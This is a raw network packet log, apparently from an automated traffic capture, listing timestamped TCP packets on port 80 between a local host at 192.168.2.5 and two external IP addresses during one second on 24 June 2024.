Jun 24, 2024 00:10:22.140181065 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.140192986 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.140203953 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.140216112 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.140227079 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.140235901 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.140238047 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.140249968 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.140254974 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.140296936 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.140414000 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.140425920 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.140435934 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.140446901 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.140456915 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.140464067 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.140503883 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.140568018 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.140579939 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.140592098 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.140603065 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.140611887 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.140615940 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.140639067 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.140671968 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.140681982 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.140693903 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.140728951 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.153649092 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.153661966 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.153672934 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.153713942 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.153749943 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.153760910 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.153760910 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.153773069 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.153784990 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.153808117 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.153841972 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.155740023 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.155751944 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.155761957 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.155788898 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.155836105 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.155839920 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.155853033 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.155864000 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.155874968 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.155884981 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.155891895 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.155941010 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.155961037 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.155972004 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.156002998 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.156034946 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.156037092 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.156047106 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.156056881 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.156068087 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.156078100 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.156084061 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.156120062 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.176286936 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.176335096 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.176345110 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.176353931 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.176371098 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.176383018 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.176394939 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.176403999 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.176450014 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.176450014 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.176464081 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.176502943 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.176515102 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.176521063 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.176551104 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.176589012 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.176604986 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.176618099 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.176628113 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.176640034 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.176650047 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.176661015 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.176682949 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.176682949 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.176723003 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.176783085 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.176796913 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.176808119 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.176845074 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.176872015 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.176886082 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.176898956 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.176909924 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.176919937 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.176929951 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.176935911 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.176964998 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.176995039 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.182931900 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.182955980 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.182970047 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.182986021 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.183020115 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.183043957 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.183048010 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.183057070 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.183073997 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.183085918 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.183095932 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.183115005 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.183131933 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.183136940 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.183178902 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.183326960 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.183372974 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.183384895 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.183386087 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.183425903 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.183439970 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.183453083 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.183465958 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.183475971 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.183495998 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.183527946 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.183528900 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.183556080 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.183590889 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.183605909 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.183617115 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.183626890 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.183640957 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.183651924 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.183651924 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.183686018 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.183697939 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.183722019 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.183732986 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.183754921 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.183784008 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.183847904 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.183860064 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.183868885 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.183878899 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.183888912 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.183898926 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.183900118 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.183933973 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.183950901 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.183978081 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.183985949 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.183998108 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.184009075 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.184019089 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.184020996 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.184067011 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.184098005 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.184237003 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.184289932 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.184302092 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.184309959 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.184328079 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.184340000 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.184350967 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.184354067 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.184376001 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.184406996 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.184426069 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.184431076 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.184444904 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.184456110 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.184499025 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.184518099 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.184525013 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.184531927 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.184544086 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.184562922 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.184600115 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.184643030 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.184655905 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.184667110 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.184675932 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.184696913 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.184729099 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.184748888 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.184751987 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.184767008 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.184777975 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.184789896 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.184804916 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.184825897 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.184875011 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.184911013 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.184922934 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.184935093 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.184947014 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.184967041 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.184998989 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.185061932 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.185075045 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.185086966 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.185096979 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.185106993 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.185115099 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.185128927 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.185134888 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.185142994 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.185159922 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.185179949 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.185190916 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.185197115 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.185247898 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.185281038 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.185293913 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.185317039 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.185328007 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.185338974 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.185342073 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.185363054 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.185398102 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.185405016 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.185448885 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.196429968 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.196494102 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.196506023 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.196511030 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.196546078 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.196563005 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.196595907 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.196609020 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.196619987 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.196630955 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.196640968 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.196651936 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.196700096 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.196702957 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.196716070 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.196726084 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.196751118 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.196779966 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.196794987 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.196806908 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.196818113 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.196851015 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.196877003 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.196888924 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.196902037 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.196938992 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.196965933 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.198180914 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.198242903 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.198262930 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.198276043 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.198312998 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.198350906 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.198364019 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.198375940 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.198388100 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.198406935 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.198445082 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.199177027 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.199203014 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.199213028 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.199232101 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.199265957 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.199266911 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.199302912 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.199316025 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.199326992 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.199340105 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.199379921 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.199384928 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.199409962 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.199434996 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.223098993 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.223110914 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.223123074 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.223145008 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.223172903 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.223177910 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.223191023 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.223201036 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.223213911 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.223222971 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.223248005 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.223289013 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.223301888 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.223314047 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.223328114 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.223367929 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.223409891 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.223422050 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.223433018 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.223445892 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.223454952 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.223457098 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.223478079 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.223504066 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.223546028 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.223557949 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.223596096 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.223643064 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.223653078 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.223663092 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.223685026 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.223710060 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.223730087 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.223741055 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.223751068 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.223762989 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.223776102 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.223812103 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.223881960 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.223891973 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.223901987 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.223927021 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.223934889 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.223951101 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.223959923 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.223963022 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.223973036 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.224008083 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.224045038 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.224338055 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.224381924 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.224390984 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.224401951 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.224431992 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.224433899 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.224442005 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.224453926 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.224476099 CEST	49725	80	192.168.2.5	77.91.77.81
